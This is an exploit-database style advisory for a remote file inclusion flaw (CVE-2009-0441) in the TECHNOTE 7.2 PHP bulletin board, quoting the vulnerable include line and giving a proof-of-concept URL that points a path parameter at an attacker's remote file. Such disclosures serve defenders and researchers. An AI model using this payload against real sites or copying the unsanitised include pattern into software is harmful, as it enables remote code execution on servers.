Technote 7.2 - Remote File Inclusion

Author: make0day
type: webapps
platform: php
port: 
date_added: 2009-02-02 
date_updated: 2017-01-31 
verified: 1 
codes: OSVDB-51740;CVE-2009-0441 
tags: 
aliases:  
screenshot_url:  
application_url: 

TECHNOTE 7.2 (08.09.25) Remote File Inclusion Vulnerability
bY make0day@gmail.com

/*************************

TECHNOTE (VERSION 7.2 (08.09.25))is bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But I find Remote File Inclusion vulnerability.
Here is the details:

**************************/
TEST ON VERSION TECHNOTE 7.2 (08.09.25)
Download : http://www.technote.co.kr/
/***************************
Remote File Inclusion Vulnerability

/body_default.php

if($GOODS['gs_input']) include "$shop_this_skin_path/2_view_body/include/form_option.php";
//File Include

*************************/

poc:

http://[site]/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=[RFI]

# milw0rm.com [2009-02-03]